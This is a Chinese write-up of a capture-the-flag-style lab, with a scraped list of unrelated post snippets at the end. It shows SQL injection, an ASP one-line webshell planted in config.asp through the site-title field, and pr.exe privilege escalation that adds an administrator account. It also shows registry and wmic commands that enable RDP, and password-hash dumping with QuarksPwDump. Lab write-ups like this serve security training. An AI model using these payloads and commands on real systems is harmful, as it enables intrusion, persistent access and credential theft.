i春秋_我很简单_解题记录
实验工具: 中国菜刀 Pr 御剑 Pangolin 3389
0x01
拿到靶机环境,根据工具猜想,存在SQL注入漏洞
先用工具扫描一下,打开明小子
工具:旁注WEB综合检测程序Ver3.6修正版
路径:C:\Tools\注入工具\Domain3.6\Domain3.6.exe
sql注入检测一下,顺利爆出管理员用户名和密码
拿去解密一下拿到明文
工具:MD5Cracksp
路径:C:\Tools\破解工具\MD5
0x02
拿到管理员密码登录后台,盲猜后台地址/admin,盲猜成功,嘻嘻嘻
根据提示需要获取webshell,浏览一下管理员界面
找了一会感觉产品图片可能会有利用,然后做了个图片马,结果发现没有上传入口-.-||
找了半天也没发现别的上传入口,实在不行了。看看题解,原来如此简单
配置网站标题,插入一句话木马:
具体实现方式为:
解释一下一句话木马
/inc/config.asp的源码是这样的:
<%
Const SiteName=”魅力企业网站管理系统 2007 中英繁商业正式版” ‘网站名称
Const EnSiteName=”MSCOM 2007″ ‘网站名称
Const SiteTitle=”魅力软件” ‘网站标题
Const EnSiteTitle=”MelyySoft” ‘网站标题
Const SiteUrl=”www.melyysoft.com” ‘网站地址
Const Miibeian=”湘ICP备05011184号” ‘网站备案号
….
%>构造一句话木马:
“%><%Eval Request(Chr(35))%><%’
插入一句话木马后,config.asp代码会变成这样:
<%
Const SiteName=””%><%Eval Request(Chr(35))%><% ‘” ‘网站名称
Const EnSiteName=”MSCOM 2007″ ‘网站名称
Const SiteTitle=”魅力软件” ‘网站标题
Const EnSiteTitle=”MelyySoft” ‘网站标题
Const SiteUrl=”www.melyysoft.com” ‘网站地址
Const Miibeian=”湘ICP备05011184号” ‘网站备案号
….
%>
上菜刀,成功进入
配置文件路径就是shell路径,刚才在修改网站信息的时候配置文件路径可以看见
0x03
想要知道管理员密码有很多工具,但是现在写需要权限运行,所以,要提权
嘻嘻嘻,拒绝访问
那就自己上传点好东西
打开虚拟终端切换至目标目录,用pr.exe执行cmd命令,添加账户;
pr “net user qwer 123 /add”,添加成功
提权:
pr “net localgroup administrators qwer /add” 成功提权
然后打开3389端口远程连接
打开3389端口的方式有两种
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%'call SetAllowTSConnections 1
这里把第一条命令写成bat文件,上传后用pr执行一下,执行成功
0x04
远程桌面连接之后,下一步要获取管理员口令
上传工具getpass,结果只能爆出当前登录管理员口令,虽然是明文的。。。
再试试QuarksPwDump,成功
QuarksPwDump –dump-hash-local
解密一下拿到flag
参考博文:开启 3389 的 cmd 命令
[在线挑战] i春秋实验《我很简单,请不要欺负我》实验详细攻略
i春秋_我很简单_解题记录相关推荐
- 路由器设置虚拟服务器王者荣耀,封杀王者荣耀 实际很简单_网络设备无线网络和技术-中关村在线...
封杀王者荣耀 实际很简单 实际上,通过锐捷睿易RG-NBR700W无线路由器来封杀王者荣耀等游戏,很简单. 首先,进入锐捷睿易RG-NBR700W的后台管控界面.然后,找到"行为管理&quo ...
- yshon对讲机如何调频率_其实很简单,对讲机频率这么调?
原标题:其实很简单,对讲机频率这么调? 频率相同是两部对讲机可以通话的前提,很多人认为只要两台对讲机是相同品牌的就可以通话,其实不然,如果不在同一个频率,即使相同品牌.相同型号的对讲机也是无法通话的: ...
- bios 传统测试软件性能,总结:调整BIOS提升主机性能很简单_技嘉 GA-G1.Sniper B5_主板评测-中关村在线...
根据对主板BIOS的简单设置,我们可以将整机硬件上尚未发挥的性能全部释放出来,而硬盘.CPU.内存的单项测试结果也很明显的体现了调整BIOS前后的性能差距.如果上述的性能参数还是过于抽象,不要紧.笔者 ...
- 乐学python编程做个游戏很简单_乐学Python编程-做个游戏很简单
Python简单易学又功能强大,而且免费开源,在国内外的很多公司得到了广泛的应用.在科学计算.游戏.图像.人工智能.机器人.教育教学和航天飞机控制等很多领域,Python也是非常重要的编程工具. 本书 ...
- [猜你喜欢]冠军 yes,boy! 分享 | 推荐系统也可以很简单 做个记录 以后方便学习
DC 关于分享 无论是充满"魔性"的"yes,boy!"这个昵称,还是诸神无法超越的7.89645分,都让这次[猜你喜欢]冠军充满了神秘色彩,最关键的是,&qu ...
- python实现洗牌算法_如何高效而完美地洗牌?用Python做很简单
Python不用学,看看你就懂:拿来就能用,用用你就会 无需安装编程软件,把代码拷贝到在线编辑器即可运行 考虑一下扑克牌,如何用电脑编程做到高效而完美地洗牌呢? 要求是代码少.效率高,洗牌的结果要同时 ...
- python123鸡兔同笼编程_用编程的方法解决“鸡兔同笼”系列问题,其实很简单
原标题:用编程的方法解决"鸡兔同笼"系列问题,其实很简单 今日题型讲解 同学们是不是觉得古人很"无聊"啊,有事没事竟然把鸡和兔子关在一个笼子里数腿玩,还要各种变 ...
- 语言axff所占字节数_【每日一答】(74)数组名v.s.指针变量,C语言其实很简单形象比喻为“是一个朋友圈的”...
下图选自<C语言其实很简单>第8章: 问:请问张老师!书上第227页一句话:指针变量a本身的地址(a所在内存字节编号)是数组的地址,数值上与元素a[0]的地址相等! 这句话是什么意思,我看 ...
- 小说里的lt什么意思_一般加杠杆是什么意思股市里?答案很简单
测评网小编原创 阿基米德很著名的一句话,相信大家都知道,而应用到金融市场里来的话,很多人都会问加杠杆是什么意思股市里.其实就像标题说的那样,对于加杠杆是什么意思股市里的答案很简单. 为什么说简单呢?因 ...
最新文章
- linux free 命令
- 设置gbk_我的gVim设置
- PHP常用算法和数据结构示例(必看篇)
- 开源之夏 | 阿里开源近百任务上线
- 设计一个按优先数调度算法实现处理器调度的程序_计算机中的程序都是怎么运行的,来深入了解一下吧...
- LeetCode 256. 粉刷房子(DP)
- Spring mvc Controller接口
- spark读写hive数据
- Python内置函数(10)——float
- jqGrid Pager、Navigator和自定义按钮(转)
- 技术实力 gw4c20b型2.0t汽油发_自动挡轻客B型房车底盘,大通与依维柯哪家强?...
- 推荐几个好用的插件(Edge)
- 微信小程序实现账号密码登入和传值显示
- 对话阿里云弹性计算负责人褚霸:把计算做到极致,关键还不加价!
- 架构设计(8)—高可用架构设计
- 分类问题:如何解决样本分布不均衡
- 【新手上路常见问答】关于知识工程
- 【工控老马】ABB AC500 系列PLC与WEST 8100+系列仪表的ASCII通讯指南
- Python的一个小程序题
- 实现内容自动撑开盒子